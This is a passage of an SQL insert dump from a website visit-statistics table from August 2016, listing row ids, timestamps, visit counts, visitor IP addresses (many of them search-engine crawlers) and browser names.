1,1,0,0,'40.77.167.32','other'),(55564,1470936021,1,1,0,0,'213.111.90.25','firefox'),(55565,1470936043,1,1,0,0,'141.8.142.61','other'),(55566,1470936351,1,1,0,0,'141.8.142.67','other'),(55567,1470937167,1,1,0,0,'178.95.166.65','chrome'),(55568,1470937182,1,1,0,0,'31.13.100.118','other'),(55569,1470937230,1,1,0,0,'208.115.113.92','other'),(55570,1470938919,1,0,1,0,'66.249.64.57',''),(55571,1470938974,1,0,1,0,'66.249.64.59',''),(55572,1470939219,1,1,0,0,'141.8.183.25','other'),(55573,1470939911,1,1,0,0,'37.55.2.83','chrome'),(55574,1470940356,1,0,1,0,'66.249.64.59',''),(55575,1470940437,1,1,0,0,'157.55.39.196','other'),(55576,1470940715,1,1,0,0,'91.196.178.101','chrome'),(55577,1470941250,1,0,1,0,'66.249.64.57',''),(55578,1470942082,1,1,0,0,'91.196.178.68','chrome'),(55579,1470942253,1,1,0,0,'157.55.39.233','other'),(55580,1470942707,1,1,0,0,'130.193.51.19','other'),(55581,1470942843,1,1,0,0,'157.55.39.196','other'),(55582,1470943013,1,0,1,0,'66.249.64.22',''),(55583,1470943270,1,1,0,0,'188.32.178.156','msie'),(55584,1470943389,1,1,0,0,'94.248.35.114','chrome'),(55585,1470943793,1,1,0,0,'176.77.126.18','msie'),(55586,1470944986,1,1,0,0,'46.73.249.64','msie'),(55587,1470945074,1,1,0,0,'207.46.13.67','other'),(55588,1470945519,1,0,1,0,'66.249.64.57',''),(55589,1470946050,1,1,0,0,'130.193.51.19','other'),(55590,1470946686,1,1,0,0,'176.77.70.99','msie'),(55591,1470947111,1,1,0,0,'130.193.50.34','other'),(55592,1470947703,2,2,0,0,'144.76.61.21','other'),(55593,1470948077,1,1,0,0,'40.77.167.32','other'),(55594,1470951122,1,0,1,0,'66.249.64.57',''),(55595,1470952477,1,1,0,0,'208.115.113.92','other'),(55596,1470953071,1,1,0,0,'141.8.183.25','other'),(55597,1470954979,1,1,0,0,'207.46.13.67','other'),(55598,1470957786,1,1,0,0,'157.55.39.196','other'),(55599,1470957839,15,15,0,0,'86.132.208.241','other'),(55600,1470958896,1,1,0,0,'130.193.50.34','other'),(55601,1470960173,1,0,1,0,'66.249.64.59',''),(55602,1470960229,1,1,0,0,'207.46.13.67','other'),(55603,1470960394,1,1,0,0,'66.249.64.59','chrome'),(55604,1470961746,1,1,0,0,'207.46.13.67','other'),(55605,1470965923,1,1,0,0,'66.249.64.57','chrome'),(55606,1470967637,1,0,1,0,'66.249.64.57',''),(55607,1470968391,1,0,1,0,'66.249.64.61',''),(55608,1470968723,2,2,0,0,'130.193.50.34','other'),(55609,1470969832,1,1,0,0,'157.55.39.233','other'),(55610,1470970005,1,0,1,0,'66.249.64.59',''),(55611,1470971778,1,1,0,0,'51.255.66.125','other'),(55612,1470971812,1,0,1,0,'66.249.64.57',''),(55613,1470973762,1,1,0,0,'141.0.14.14','other'),(55614,1470973980,1,1,0,0,'141.8.183.25','other'),(55615,1470974144,1,1,0,0,'130.193.51.19','other'),(55616,1470975632,1,1,0,0,'180.76.15.17','other'),(55617,1470975846,1,0,1,0,'66.249.64.22',''),(55618,1470979219,1,0,1,0,'66.249.64.59',''),(55619,1470979299,1,0,1,0,'66.249.64.57',''),(55620,1470980252,1,1,0,0,'188.115.129.149','chrome'),(55621,1470980804,1,1,0,0,'194.44.134.10','chrome'),(55622,1470981537,1,1,0,0,'151.80.31.108','other'),(55623,1470982170,2,2,0,0,'141.8.183.25','other'),(55624,1470982303,1,1,0,0,'37.55.2.83','chrome'),(55625,1470982731,1,0,1,0,'66.249.64.59',''),(55626,1470983001,1,0,1,0,'66.249.64.61',''),(55627,1470983237,1,1,0,0,'51.255.65.61','other'),(55628,1470983249,1,1,0,0,'130.193.50.34','other'),(55629,1470983270,1,0,1,0,'66.249.64.28',''),(55630,1470983272,1,1,0,0,'51.255.65.6','other'),(55631,1470983964,1,1,0,0,'109.237.87.178','chrome'),(55632,1470984017,1,1,0,0,'151.80.31.156','other'),(55633,1470984264,1,1,0,0,'208.115.113.92','other'),(55634,1470984389,1,0,1,0,'66.249.64.59',''),(55635,1470984685,1,1,0,0,'51.255.65.55','other'),(55636,1470985372,1,1,0,0,'95.24.54.40','chrome'),(55637,1470985374,1,1,0,0,'178.140.207.164','chrome'),(55638,1470985375,1,1,0,0,'176.193.89.120','opera'),(55639,1470985377,1,1,0,0,'188.32.226.219','firefox'),(55640,1470985433,1,1,0,0,'164.132.161.75','other'),(55641,1470985922,1,1,0,0,'164.132.161.63','other'),(55642,1470986225,1,1,0,0,'51.255.65.89','other'),(55643,1470986615,1,1,0,0,'91.196.177.94','chrome'),(55644,1470987066,1,1,0,0,'94.179.43.232','firefox'),(55645,1470987104,1,1,0,0,'91.196.178.169','opera'),(55646,1470987142,1,1,0,0,'178.95.246.12','firefox'),(55647,1470988469,1,0,1,0,'66.249.64.57',''),(55648,1470988577,1,0,1,0,'68.180.230.111',''),(55649,1470989474,1,1,0,0,'37.55.2.83','chrome'),(55650,1470992502,1,1,0,0,'40.77.167.32','other'),(55651,1470992569,1,1,0,0,'217.69.133.231','other'),(55652,1470993251,2,2,0,0,'95.133.8.244','opera'),(55653,1470994292,1,1,0,0,'91.244.37.168','opera'),(55654,1470994322,1,1,0,0,'178.95.246.12','firefox'),(55655,1470994881,1,0,1,0,'66.249.64.59',''),(55656,1470995151,1,1,0,0,'51.255.65.11','other'),(55657,1470995228,1,1,0,0,'178.95.246.12','firefox'),(55658,1470995315,1,1,0,0,'164.132.161.71','other'),(55659,1470995640,1,1,0,0,'91.196.178.69','firefox'),(55660,1470996692,1,1,0,0,'91.196.178.65','firefox'),(55661,1470996890,1,1,0,0,'164.132.161.77','other'),(55662,1470997512,1,1,0,0,'91.196.178.168','chrome'),(55663,1470998452,1,1,0,0,'66.249.64.57','chrome'),(55664,1470998830,1,1,0,0,'91.196.178.101','chrome'),(55665,1470999237,1,1,0,0,'37.53.89.22','chrome'),(55666,1470999998,1,0,1,0,'66.249.64.57',''),(55667,1471000399,1,1,0,0,'91.201.180.92','chrome'),(55668,1471001602,1,1,0,0,'178.95.246.12','firefox'),(55669,1471001894,1,1,0,0,'208.115.113.92','other'),(55670,1471003000,1,1,0,0,'122.177.103.49','firefox'),(55671,1471003011,1,0,1,0,'66.249.64.28',''),(55672,1471003581,1,1,0,0,'178.95.246.12','firefox'),(55673,1471003882,1,1,0,0,'194.44.134.10','chrome'),(55674,1471006721,1,0,1,0,'66.249.64.57',''),(55675,1471006820,1,1,0,0,'178.95.246.12','firefox'),(55676,1471007458,1,1,0,0,'91.196.178.104','chrome'),(55677,1471007866,1,1,0,0,'91.244.13.85','chrome'),(55678,1471008460,1,1,0,0,'157.55.39.233','other'),(55679,1471008906,1,1,0,0,'91.196.178.168','chrome'),(55680,1471009083,1,1,0,0,'157.55.39.196','other'),(55681,1471009191,1,1,0,0,'94.179.38.60','firefox'),(55682,1471009876,1,1,0,0,'104.45.18.178','other'),(55683,1471010612,1,1,0,0,'164.132.161.58','other'),(55684,1471010901,1,1,0,0,'217.69.133.11','other'),(55685,1471011025,1,1,0,0,'164.132.161.83','other'),(55686,1471012326,1,1,0,0,'164.132.161.71','other'),(55687,1471012647,1,1,0,0,'51.255.65.48','other'),(55688,1471013040,1,1,0,0,'176.193.108.190','chrome'),(55689,1471013041,1,1,0,0,'176.77.87.254','chrome'),(55690,1471013042,1,1,0,0,'5.228.59.217','opera'),(55691,1471013044,1,1,0,0,'93.80.47.143','firefox'),(55692,1471013273,1,1,0,0,'208.115.113.92','other'),(55693,1471013350,1,1,0,0,'164.132.161.33','other'),(55694,1471013374,1,1,0,0,'178.94.231.203','chrome'),(55695,1471013442,1,0,1,0,'66.249.64.59',''),(55696,1471013850,1,1,0,0,'51.255.65.20','other'),(55697,1471014087,1,1,0,0,'151.80.31.170','other'),(55698,1471014238,1,1,0,0,'91.244.13.85','chrome'),(55699,1471014261,35,35,0,0,'69.30.221.242','other'),(55700,1471014860,1,1,0,0,'51.255.65.43','other'),(55701,1471015020,1,1,0,0,'91.196.177.26','chrome'),(55702,1471015080,1,1,0,0,'180.76.15.157','other'),(55703,1471015313,1,1,0,0,'151.80.31.179','other'),(55704,1471015398,1,1,0,0,'51.255.65.5','other'),(55705,1471016146,1,1,0,0,'164.132.161.85','other'),(55706,1471016358,1,1,0,0,'40.77.167.32','other'),(55707,1471018623,1,1,0,0,'66.249.64.59','chrome'),(55708,1471019875,1,1,0,0,'62.210.148.91','chrome'),(55709,1471020660,1,0,1,0,'66.249.64.61',''),(55710,1471020865,1,1,0,0,'208.115.113.92','other'),(55711,1471020959,1,1,0,0,'51.255.65.18','other'),(55712,1471022215,1,1,0,0,'51.255.65.49','other'),(55713,1471022317,1,1,0,0,'51.255.65.95','other'),(55714,1471022399,1,1,0,0,'51.255.65.21','other'),(55715,1471022600,1,1,0,0,'151.80.31.101','other'),(55716,1471022734,1,1,0,0,'151.80.31.182','other'),(55717,1471022870,1,1,0,0,'164.132.161.35','other'),(55718,1471023128,1,1,0,0,'151.80.31.169','other'),(55719,1471023215,1,0,1,0,'68.180.230.111',''),(55720,1471024194,1,1,0,0,'208.115.113.92','other'),(55721,1471024605,1,1,0,0,'40.77.167.32','other'),(55722,1471024787,1,1,0,0,'91.196.178.98','chrome'),(55723,1471025750,1,1,0,0,'157.55.39.196','other'),(55724,1471025898,1,1,0,0,'51.255.65.7','other'),(55725,1471026024,1,1,0,0,'151.80.31.178','other'),(55726,1471026387,1,1,0,0,'91.196.178.98','chrome'),(55727,1471027368,2,2,0,0,'164.132.161.58','other'),(55728,1471027725,1,1,0,0,'164.132.161.45','other'),(55729,1471028228,1,1,0,0,'141.0.14.34','other'),(55730,1471028756,1,1,0,0,'164.132.161.67','other'),(55731,1471028773,1,1,0,0,'51.255.65.12','other'),(55732,1471029055,1,1,0,0,'164.132.161.4','other'),(55733,1471029093,1,1,0,0,'151.80.31.174','other'),(55734,1471029492,1,1,0,0,'51.255.65.3','other'),(55735,1471029765,1,1,0,0,'164.132.161.56','other'),(55736,1471030093,1,1,0,0,'91.196.178.98','chrome'),(55737,1471030121,1,1,0,0,'176.77.5.119','msie'),(55739,1471030123,1,1,0,0,'95.221.215.210','msie'),(55740,1471030129,1,1,0,0,'176.193.106.132','msie'),(55741,1471030746,1,1,0,0,'51.255.65.97','other'),(55742,1471031250,1,1,0,0,'51.255.65.44','other'),(55743,1471031386,1,1,0,0,'51.255.65.68','other'),(55744,1471031593,1,0,1,0,'66.249.64.189',''),(55745,1471032006,1,0,1,0,'66.249.64.187',''),(55746,1471032405,1,1,0,0,'91.196.178.98','chrome'),(55747,1471032438,1,1,0,0,'51.255.65.86','other'),(55748,1471033390,1,1,0,0,'51.255.65.96','other'),(55750,1471033419,1,1,0,0,'157.55.39.196','other'),(55751,1471033420,2,2,0,0,'199.58.86.209','other'),(55752,1471033576,1,1,0,0,'178.123.61.157','firefox'),(55753,1471033869,1,1,0,0,'51.255.65.68','other'),(55754,1471033968,1,1,0,0,'164.132.161.2','other'),(55755,1471034103,1,1,0,0,'164.132.161.76','other'),(55756,1471034429,1,1,0,0,'51.255.65.60','other'),(55757,1471035082,2,2,0,0,'51.255.48.154','other'),(55758,1471035225,1,1,0,0,'91.196.178.98','chrome'),(55759,1471036257,1,1,0,0,'51.255.65.81','other'),(55760,1471037571,1,1,0,0,'164.132.161.4','other'),(55761,1471038338,1,1,0,0,'151.80.31.179','other'),(55762,1471038608,1,1,0,0,'151.80.31.166','other'),(55763,1471038705,1,1,0,0,'51.255.65.51','other'),(55764,1471039284,1,0,1,0,'66.249.64.187',''),(55765,1471039613,1,1,0,0,'51.255.65.14','other'),(55766,1471039881,1,1,0,0,'66.249.64.189','chrome'),(55767,1471040444,1,1,0,0,'164.132.161.84','other'),(55768,1471041635,1,1,0,0,'66.249.64.189','chrome'),(55769,1471042502,1,1,0,0,'66.249.64.187','chrome'),(55770,1471042695,1,1,0,0,'40.77.167.32','other'),(55771,1471042887,1,1,0,0,'51.255.65.46','other'),(55772,1471043530,1,1,0,0,'66.249.64.155','chrome'),(55773,1471043783,15,15,0,0,'78.46.21.97','other'),(55774,1471044221,1,1,0,0,'40.77.167.32','other'),(55775,1471045181,1,1,0,0,'51.255.65.31','other'),(55776,1471045278,1,1,0,0,'207.46.13.67','other'),(55777,1471045629,1,1,0,0,'164.132.161.50','other'),(55778,1471046134,1,1,0,0,'151.80.31.108','other'),(55779,1471047069,1,1,0,0,'151.80.31.184','other'),(55780,1471047219,1,0,1,0,'66.249.64.187',''),(55781,1471047812,1,1,0,0,'164.132.161.35','other'),(55782,1471048816,1,1,0,0,'51.255.65.77','other'),(55783,1471049501,1,1,0,0,'157.55.39.196','other'),(55784,1471049990,1,1,0,0,'51.255.65.11','other'),(55785,1471050462,1,1,0,0,'176.193.97.214','chrome'),(55786,1471050463,1,1,0,0,'176.77.49.252','chrome'),(55787,1471050464,1,1,0,0,'93.80.47.143','firefox'),(55788,1471050465,1,1,0,0,'5.228.103.206','opera'),(55789,1471050880,1,1,0,0,'164.132.161.31','other'),(55790,1471051175,1,1,0,0,'164.132.161.56','other'),(55791,1471051220,1,1,0,0,'164.132.161.42','other'),(55792,1471052909,1,1,0,0,'164.132.161.3','other'),(55793,1471053863,1,1,0,0,'207.46.13.67','other'),(55794,1471053992,2,2,0,0,'157.55.39.196','other'),(55795,1471054349,1,1,0,0,'51.255.65.17','other'),(55796,1471054649,1,1,0,0,'51.255.65.74','other'),(55797,1471055025,1,1,0,0,'51.255.65.19','other'),(55798,1471055045,1,1,0,0,'51.255.65.94','other'),(55799,1471055419,1,0,1,0,'66.249.64.185',''),(55800,1471055449,1,1,0,0,'151.80.31.176','other'),(55801,1471055840,1,1,0,0,'157.55.39.196','other'),(55802,1471056032,3,3,0,0,'69.30.234.2','other'),(55803,1471056787,1,0,1,0,'66.249.64.185',''),(55804,1471056892,1,1,0,0,'180.76.15.134','other'),(55805,1471057110,1,0,1,0,'68.180.230.111',''),(55806,1471057561,1,1,0,0,'180.76.15.7','other'),(55807,1471058048,1,1,0,0,'51.255.65.27','other'),(55808,1471058392,1,1,0,0,'66.249.64.185','chrome'),(55809,1471058553,1,1,0,0,'157.55.39.196','other'),(55810,1471059226,1,1,0,0,'207.46.13.67','other'),(55811,1471059359,1,0,1,0,'66.249.64.187',''),(55812,1471059744,1,1,0,0,'151.80.31.159','other'),(55813,1471059865,1,1,0,0,'51.255.65.34','other'),(55814,1471060136,1,1,0,0,'51.255.65.81','other'),(55815,1471060386,1,1,0,0,'164.132.161.45','other'),(55816,1471060969,2,0,2,0,'66.249.64.189',''),(55817,1471061899,1,0,1,0,'66.249.64.185',''),(55818,1471062005,1,1,0,0,'51.255.65.74','other'),(55819,1471063060,1,1,0,0,'180.76.15.16','other'),(55820,1471063061,1,1,0,0,'180.76.15.14','other'),(55821,1471063921,1,0,1,0,'66.249.64.187',''),(55822,1471064358,97,97,0,0,'178.63.86.11','other'),(55823,1471064930,1,1,0,0,'164.132.161.30','other'),(55824,1471065609,1,1,0,0,'51.255.65.35','other'),(55825,1471065634,1,1,0,0,'151.80.31.164','other'),(55826,1471066471,1,1,0,0,'164.132.161.12','other'),(55827,1471066815,1,1,0,0,'95.24.35.64','msie'),(55829,1471066816,1,1,0,0,'176.77.121.188','msie'),(55831,1471067220,1,1,0,0,'51.255.65.5','other'),(55832,1471068033,1,1,0,0,'51.255.65.12','other'),(55833,1471068271,1,1,0,0,'157.55.39.233','other'),(55834,1471068517,1,1,0,0,'207.46.13.67','other'),(55835,1471068842,1,1,0,0,'66.249.93.109','chrome'),(55836,1471069375,1,1,0,0,'91.244.13.85','chrome'),(55837,1471071024,1,1,0,0,'91.244.13.85','chrome'),(55838,1471071088,1,1,0,0,'164.132.161.19','other'),(55839,1471071443,1,1,0,0,'51.255.65.89','other'),(55840,1471072666,1,1,0,0,'164.132.161.57','other'),(55841,1471072696,1,1,0,0,'141.8.142.62','other'),(55842,1471072758,1,1,0,0,'164.132.161.29','other'),(55843,1471072975,1,1,0,0,'2.93.159.126','chrome'),(55844,1471072976,1,1,0,0,'176.77.49.252','chrome'),(55845,1471072978,1,1,0,0,'93.80.47.143','firefox'),(55847,1471073138,1,1,0,0,'128.68.139.56','msie'),(55848,1471074337,1,1,0,0,'164.132.161.41','other'),(55849,1471074656,1,0,1,0,'66.249.64.149',''),(55850,1471074860,1,1,0,0,'164.132.161.46','other'),(55851,1471075110,1,0,1,0,'66.249.64.152',''),(55852,1471075143,1,1,0,0,'40.77.167.32','other'),(55853,1471075566,1,1,0,0,'95.221.225.181','msie'),(55854,1471076642,1,0,1,0,'66.249.64.187',''),(55855,1471076916,1,1,0,0,'51.255.65.59','other'),(55856,1471077179,1,1,0,0,'51.255.65.61','other'),(55857,1471077886,1,1,0,0,'95.221.196.173','msie'),(55858,1471078908,1,0,1,0,'66.249.64.149',''),(55859,1471078940,1,0,1,0,'66.249.64.189',''),(55860,1471080959,1,1,0,0,'207.46.13.67','other'),(55861,1471081280,1,0,1,0,'66.249.64.187',''),(55862,1471081604,1,1,0,0,'157.55.39.196','other'),(55863,1471081726,1,1,0,0,'180.76.15.141','other'),(55864,1471082582,1,0,1,0,'66.249.64.149',''),(55865,1471082674,1,1,0,0,'164.132.161.6','other'),(55866,1471082894,1,1,0,0,'164.132.161.88','other'),(55867,1471083590,1,1,0,0,'164.132.161.80','other'),(55868,1471083975,1,1,0,0,'157.55.39.196','other'),(55869,1471084916,1,0,1,0,'68.180.230.111',''),(55870,1471085103,1,0,1,0,'66.249.64.185',''),(55871,1471085120,2,2,0,0,'157.55.39.196','other'),(55872,1471085448,1,1,0,0,'130.193.37.21','other'),(55873,1471085598,1,1,0,0,'51.255.65.30','other'),(55874,1471085698,1,1,0,0,'141.8.132.79','other'),(55875,1471085738,2,2,0,0,'157.55.39.233','other'),(55876,1471086010,1,0,1,0,'66.249.64.185',''),(55877,1471086422,1,1,0,0,'157.55.39.196','other'),(55878,1471086851,14,14,0,0,'95.158.189.118','other'),(55879,1471087534,1,1,0,0,'51.255.65.61','other'),(55880,1471087817,1,1,0,0,'40.77.167.32','other'),(55881,1471087831,10,10,0,0,'95.158.189.118','other'),(55882,1471088209,1,1,0,0,'51.255.65.56','other'),(55883,1471088800,6,6,0,0,'95.158.189.118','other'),(55884,1471088894,1,0,1,0,'66.249.64.152',''),(55885,1471089819,1,1,0,0,'164.132.161.86','other'),(55886,1471089902,1,1,0,0,'208.115.113.82','other'),(55887,1471089927,3,3,0,0,'95.158.189.118','other'),(55888,1471090218,1,1,0,0,'88.135.215.144','chrome'),(55889,1471090238,1,1,0,0,'141.8.132.2','other'),(55890,1471093044,1,1,0,0,'164.132.161.77','other'),(55891,1471093291,1,0,1,0,'66.249.64.185',''),(55892,1471093520,1,1,0,0,'51.255.65.3','other'),(55893,1471093552,1,1,0,0,'164.132.161.37','other'),(55894,1471093657,1,1,0,0,'51.255.65.46','other'),(55895,1471093782,1,1,0,0,'164.132.161.97','other'),(55896,1471094031,1,0,1,0,'66.249.64.149',''),(55897,1471094041,2,0,2,0,'66.249.64.189',''),(55898,1471094200,1,1,0,0,'51.255.65.41','other'),(55899,1471094322,2,2,0,0,'40.77.167.32','other'),(55900,1471094695,1,1,0,0,'46.188.40.164','chrome'),(55903,1471094696,1,1,0,0,'185.16.107.78','chrome'),(55904,1471095130,1,1,0,0,'157.55.39.233','other'),(55905,1471095605,1,1,0,0,'94.180.160.128','msie'),(55906,1471095608,1,1,0,0,'188.255.27.34','msie'),(55907,1471095609,1,1,0,0,'95.221.226.87','msie'),(55908,1471095610,1,1,0,0,'176.77.93.129','msie'),(55909,1471096570,1,1,0,0,'51.255.65.40','other'),(55910,1471096620,1,1,0,0,'51.255.65.3','other'),(55911,1471097100,2,1,1,0,'66.249.64.187',''),(55912,1471097778,1,1,0,0,'51.255.65.7','other'),(55913,1471097974,1,0,1,0,'66.249.64.185',''),(55914,1471098631,1,1,0,0,'207.46.13.67','other'),(55915,1471099301,1,1,0,0,'141.8.183.25','other'),(55916,1471099482,1,0,1,0,'66.249.64.187',''),(55917,1471100424,1,1,0,0,'94.179.123.227','firefox'),(55918,1471101089,1,0,1,0,'66.249.73.238',''),(55919,1471101139,1,0,1,0,'66.249.64.185',''),(55920,1471101345,1,1,0,0,'91.196.178.38','firefox'),(55921,1471102634,1,1,0,0,'164.132.161.68','other'),(55922,1471102754,1,1,0,0,'40.77.167.32','other'),(55923,1471103033,1,1,0,0,'164.132.161.90','other'),(55924,1471103094,2,0,2,0,'66.249.64.189',''),(55925,1471103324,1,0,1,0,'66.249.64.185',''),(55926,1471103333,1,0,1,0,'66.249.64.155',''),(55927,1471103957,1,1,0,0,'51.255.65.69','other'),(55928,1471104085,1,1,0,0,'157.55.39.196','other'),(55929,1471105204,1,1,0,0,'157.55.39.196','other'),(55930,1471105789,1,1,0,0,'151.80.31.158','other'),(55931,1471105951,1,1,0,0,'51.255.65.59','other'),(55932,1471106222,2,0,2,0,'66.249.64.189',''),(55933,1471106314,1,1,0,0,'164.132.161.82','other'),(55934,1471109417,1,1,0,0,'40.77.167.32','other'),(55935,1471109987,1,1,0,0,'164.132.161.18','other'),(55936,1471110882,1,1,0,0,'151.80.31.108','other'),(55937,1471111079,1,1,0,0,'91.196.178.103','chrome'),(55938,1471111510,1,1,0,0,'151.80.31.181','other'),(55939,1471111539,1,1,0,0,'164.132.161.96','other'),(55940,1471112214,1,1,0,0,'51.255.65.19','other'),(55941,1471112394,1,1,0,0,'164.132.161.45','other'),(55942,1471112442,1,1,0,0,'157.55.39.233','other'),(55943,1471112524,1,1,0,0,'164.132.161.6','other'),(55944,1471112928,1,1,0,0,'51.255.65.90','other'),(55945,1471113134,1,1,0,0,'94.179.79.115','chrome'),(55946,1471113232,1,1,0,0,'164.132.161.12','other'),(55947,1471114222,1,1,0,0,'151.80.31.159','other'),(55948,1471115447,1,1,0,0,'51.255.65.82','other'),(55949,1471115561,1,1,0,0,'94.179.79.115','chrome'),(55950,1471116942,1,0,1,0,'66.249.64.187',''),(55951,1471117304,1,1,0,0,'157.55.39.196','other'),(55952,1471117474,1,0,1,0,'66.249.64.189',''),(55953,1471117506,1,1,0,0,'164.132.161.32','other'),(55954,1471118417,1,0,1,0,'66.249.64.155',''),(55955,1471118442,1,1,0,0,'151.80.31.173','other'),(55956,1471118452,1,1,0,0,'180.76.15.8','other'),(55957,1471118641,1,1,0,0,'66.249.64.189','chrome'),(55958,1471119330,1,0,1,0,'66.249.64.187',''),(55959,1471119546,1,1,0,0,'207.46.13.9','other'),(55960,1471119640,1,1,0,0,'66.249.64.187','chrome'),(55961,1471119855,1,1,0,0,'40.77.167.32','other'),(55962,1471121630,1,1,0,0,'141.8.183.25','other'),(55963,1471122234,1,1,0,0,'66.249.64.185','chrome'),(55964,1471122519,1,1,0,0,'40.77.167.32','other'),(55965,1471126228,1,1,0,0,'51.255.65.54','other'),(55966,1471127286,1,1,0,0,'164.132.161.59','other'),(55967,1471127405,2,2,0,0,'144.76.7.107','other'),(55968,1471128534,2,2,0,0,'46.4.120.3','other'),(55969,1471128606,1,1,0,0,'66.249.64.189','chrome'),(55970,1471128775,1,1,0,0,'164.132.161.46','other'),(55971,1471128792,1,1,0,0,'164.132.161.14','other'),(55972,1471128958,1,1,0,0,'51.255.65.31','other'),(55973,1471129776,1,1,0,0,'164.132.161.73','other'),(55974,1471130049,1,1,0,0,'164.132.161.53','other'),(55975,1471130252,1,1,0,0,'151.80.31.155','other'),(55976,1471130685,5,5,0,0,'51.255.51.250','other'),(55977,1471131192,1,1,0,0,'164.132.161.61','other'),(55978,1471131211,1,1,0,0,'208.115.113.92','other'),(55979,1471131448,1,0,1,0,'66.249.64.187',''),(55980,1471131825,1,1,0,0,'151.80.31.170','other'),(55981,1471131981,1,1,0,0,'51.255.65.43','other'),(55982,1471132224,1,1,0,0,'66.249.64.149','chrome'),(55983,1471132298,1,1,0,0,'164.132.161.70','other'),(55984,1471132762,1,1,0,0,'51.255.65.73','other'),(55985,1471133281,1,1,0,0,'164.132.161.67','other'),(55986,1471134089,1,1,0,0,'164.132.161.42','other'),(55987,1471134343,1,1,0,0,'151.80.31.155','other'),(55988,1471134430,1,1,0,0,'51.255.65.59','other'),(55989,1471135563,1,1,0,0,'164.132.161.88','other'),(55990,1471135614,1,1,0,0,'5.255.253.36','other'),(55991,1471136527,1,1,0,0,'192.166.219.136','other'),(55992,1471136844,1,1,0,0,'164.132.161.73','other'),(55993,1471137013,2,0,2,0,'66.249.64.185',''),(55994,1471138119,1,0,1,0,'66.249.64.189',''),(55995,1471138595,1,1,0,0,'157.55.39.249','other'),(55996,1471139154,4,4,0,0,'136.243.152.18','other'),(55997,1471139365,1,1,0,0,'66.249.64.187','chrome'),(55998,1471139555,1,1,0,0,'157.55.39.249','other'),(55999,1471140454,1,1,0,0,'164.132.161.13','other'),(56000,1471140595,1,1,0,0,'151.80.31.178','other'),(56001,1471140730,2,0,2,0,'66.249.64.152',''),(56002,1471140788,1,1,0,0,'51.255.65.49','other'),(56003,1471141511,1,1,0,0,'164.132.161.23','other'),(56004,1471141590,4,0,4,0,'68.180.230.111',''),(56005,1471141740,1,1,0,0,'51.255.65.70','other'),(56006,1471141842,1,1,0,0,'51.255.65.47','other'),(56007,1471142018,1,1,0,0,'164.132.161.63','other'),(56008,1471142065,1,1,0,0,'51.255.65.7','other'),(56009,1471142122,1,1,0,0,'180.76.15.146','other'),(56010,1471142123,1,1,0,0,'180.76.15.139','other'),(56011,1471142756,1,0,1,0,'68.180.230.111',''),(56012,1471143451,1,1,0,0,'164.132.161.45','other'),(56013,1471143578,1,1,0,0,'208.115.113.82','other'),(56014,1471143932,1,1,0,0,'94.179.46.45','chrome'),(56015,1471144415,1,0,1,0,'66.249.64.189',''),(56016,1471144417,1,1,0,0,'51.255.65.9','other'),(56017,1471145409,1,1,0,0,'151.80.31.157','other'),(56018,1471145529,1,1,0,0,'151.80.31.160','other'),(56019,1471145604,1,1,0,0,'157.55.39.63','other'),(56020,1471145832,1,1,0,0,'217.69.133.4','other'),(56021,1471146020,1,1,0,0,'151.80.31.101','other'),(56022,1471146331,1,1,0,0,'151.80.31.164','other'),(56023,1471147031,1,1,0,0,'151.80.31.172','other'),(56024,1471147098,1,0,1,0,'66.249.64.185',''),(56025,1471147260,1,0,1,0,'66.249.64.189',''),(56026,1471148813,1,0,1,0,'66.249.64.189',''),(56027,1471149498,1,0,1,0,'66.249.64.185',''),(56028,1471149701,1,1,0,0,'51.255.65.84','other'),(56029,1471150255,1,1,0,0,'51.255.65.11','other'),(56030,1471150328,1,1,0,0,'51.255.65.73','other'),(56031,1471151138,1,0,1,0,'66.249.64.185',''),(56032,1471152961,1,1,0,0,'51.255.65.48','other'),(56033,1471153191,1,1,0,0,'164.132.161.57','other'),(56034,1471153655,1,1,0,0,'66.102.9.93','chrome'),(56035,1471153973,1,1,0,0,'207.46.13.9','other'),(56036,1471154490,1,1,0,0,'164.132.161.58','other'),(56037,1471155189,1,1,0,0,'164.132.161.56','other'),(56038,1471155439,1,1,0,0,'51.255.65.41','other'),(56039,1471155556,1,1,0,0,'164.132.161.35','other'),(56040,1471156021,1,1,0,0,'164.132.161.15','other'),(56041,1471156444,1,1,0,0,'176.193.140.25','other'),(56042,1471157300,1,1,0,0,'51.255.65.56','other'),(56043,1471157448,1,1,0,0,'157.55.39.249','other'),(56044,1471157728,1,1,0,0,'46.211.2.166','chrome'),(56045,1471157744,1,1,0,0,'164.132.161.54','other'),(56046,1471158054,1,0,1,0,'66.249.66.182',''),(56047,1471158757,1,1,0,0,'157.55.39.34','other'),(56048,1471158977,6,6,0,0,'178.63.86.11','other'),(56049,1471159100,1,1,0,0,'51.255.65.38','other'),(56050,1471159135,60,60,0,0,'51.255.36.87','other'),(56051,1471159752,1,0,1,0,'66.249.66.188',''),(56052,1471161555,1,1,0,0,'207.46.13.9','other'),(56053,1471161738,1,0,1,0,'66.249.66.185',''),(56054,1471162247,1,1,0,0,'157.55.39.34','other'),(56055,1471162991,1,1,0,0,'51.255.65.4','other'),(56056,1471163304,1,1,0,0,'51.255.65.57','other'),(56057,1471164672,2,2,0,0,'81.109.65.38','other'),(56058,1471164810,1,1,0,0,'157.55.39.249','other'),(56059,1471164879,1,1,0,0,'164.132.161.71','other'),(56060,1471165199,1,1,0,0,'51.255.65.35','other'),(56061,1471165321,1,1,0,0,'51.255.65.16','other'),(56062,1471165779,1,0,1,0,'66.249.66.185',''),(56063,1471166309,1,1,0,0,'51.255.65.67','other'),(56064,1471166398,1,1,0,0,'51.255.65.17','other'),(56065,1471167085,1,0,1,0,'66.249.66.188',''),(56066,1471167786,1,0,1,0,'66.249.66.182',''),(56067,1471168419,1,1,0,0,'151.80.31.163','other'),(56068,1471168434,1,1,0,0,'164.132.161.81','other'),(56069,1471168893,1,0,1,0,'66.249.66.182',''),(56070,1471169029,1,1,0,0,'164.132.161.88','other'),(56071,1471169651,1,1,0,0,'51.255.65.72','other'),(56072,1471170457,1,0,1,0,'66.249.66.185',''),(56073,1471170536,1,1,0,0,'51.255.65.84','other'),(56074,1471170870,1,0,1,0,'66.249.66.182',''),(56075,1471171325,1,1,0,0,'51.255.65.43','other'),(56076,1471171543,1,1,0,0,'157.55.39.63','other'),(56077,1471172735,1,1,0,0,'164.132.161.22','other'),(56078,1471173110,1,1,0,0,'66.249.66.185','chrome'),(56079,1471173400,1,1,0,0,'51.255.65.10','other'),(56080,1471173580,1,1,0,0,'164.132.161.97','other'),(56081,1471174094,1,1,0,0,'151.80.31.167','other'),(56082,1471174386,1,1,0,0,'164.132.161.2','other'),(56083,1471175694,1,0,1,0,'66.249.66.180',''),(56084